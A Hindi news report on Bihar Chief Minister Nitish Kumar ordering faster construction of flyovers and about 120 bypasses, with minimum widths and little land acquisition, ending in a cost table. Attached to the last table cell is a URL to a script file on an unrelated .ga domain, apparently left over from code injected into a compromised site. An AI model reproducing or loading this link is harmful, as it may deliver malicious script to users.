मुख्यमंत्री ने दिए निर्देश बहुत जल्द तैयार होंगे फ्लाईओवर तथा बाईपास।

 

 

 

बिहार,( कुलसूम फात्मा )       सोमवार के दिन बिहार के मुख्यमंत्री नीतीश कुमार के समक्ष रोड कंस्ट्रक्शन डिपार्टमेंट ने अपनी बात रिव्यू के पश्चात रखी और यह वार्तालाप 2 घंटे तक के मुख्यमंत्री के समक्ष चला। और मुख्यमंत्री ने निर्माण से संबंधित कार्य में गति लाने के शक्ति के साथ निर्देश दिए।

 

असल में बिहार के मुख्यमंत्री नीतीश कुमार के समक्ष सोमवार के दिन आत्मनिर्भर बिहार के सात निश्चय 2 के अंदर इजी़ कनेक्टिविटी के जरिए स्टेट में फ्लाईओवर तथा बाईपास से संबंधित निर्माण की तैयारी के संबंध में नीतीश कुमार के सामने डिपार्टमेंट ने अपनी बात रखी और 2 घंटे के पश्चात सीएम ने निर्माण कार्य में गति लाने का निर्देश दिया।

 

मुख्यमंत्री ने रिव्यु के पश्चात कहां के इज़ी कनेक्टिविटी राज्य के लिए सिटी एरिया में बहुत जरूरी है और बाईपास तथा फ्लाईओवर के कंस्ट्रक्शन के लिए कार्य की योजना पहले बनाई जाए और सख्ती के साथ निर्देश दिया के बाईपास तथा रोड को ज्यादा से ज्यादा चौड़ा बनाया जाए, जिससे के आने वाले वक्त में आवश्यकता पूर्ण रूप से पूरी की जा सके तथा कहां के बाईपास 7 मीटर से कम चौड़ा नहीं होना चाहिए और सिटी के अंदर फ्लाईओवर के कंस्ट्रक्शन के लिए अंदाज़ा पहले लगाया जाए और फिर उस पर कार्य किया जाए। आकलन से यातायात व्यवस्था अच्छी बनी रहेगी और बिहार के लोगों को जाम से भी छुटकारा मिलेगा।   इसके साथ वक्त की भी बचत की जा सकेगी। उन्होंने कहा की बाईपास रोड के चयन में इस बात का पूर्ण रुप से ध्यान रखा जाना चाहिए कि लैंड एक्विजिशन कम से कम हो।

 

बता दें की बिहार राज्य के 37 डिस्ट्रिक्ट के साथ-साथ बाकी सिटी में बाईपास बनाने के लिए साइट सर्वे का कार्य पूर्ण कर लिया गया है। और तकरीबन 120 नई बाईपास का कंस्ट्रक्शन अगले आने वाले 3 वर्षों में पूर्ण कर लिया जाएगा। इन बाईपास तथा फ्लाईओवर से संबंधित कार्य निर्माण में तेजी के साथ गति लाने के लिए मुख्यमंत्री ने निर्देश दिए और इस मीटिंग में मुख्यमंत्री ने कहा के स्टेट में आवश्यकता के हिसाब से फ्लाईओवर बनाए जाएंगे।  और लैंड एक्विजिशन की यदि कोई दिक्कत आती है तो ऐसे इलाकों में एलिवेटेड रोड बना करके उसका बाईपास के रूप में प्रयोग कर लिया जाएगा। नीतीश कुमार का प्रयास है के बाईपास बनाने में तकरीबन जमीन लैंड एक्विजिशन कम से कम प्रयोग की जाए। निर्माण कार्य समय के अंतर्गत व पूर्ण कर लिया जाए।

 

  • जाने कुछ खास बातें।

 

    रोड                                   – बाईपास –                         खर्च होगा।

राष्ट्रीय राजमार्ग 31               224 किमी तथा                    1987 करोड़

 

राष्ट्रीय राजमार्ग 33,             230 किमी                           1134 करोड़

बड़े जिला पथ 56                254 किमी                           1033 करोड़।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.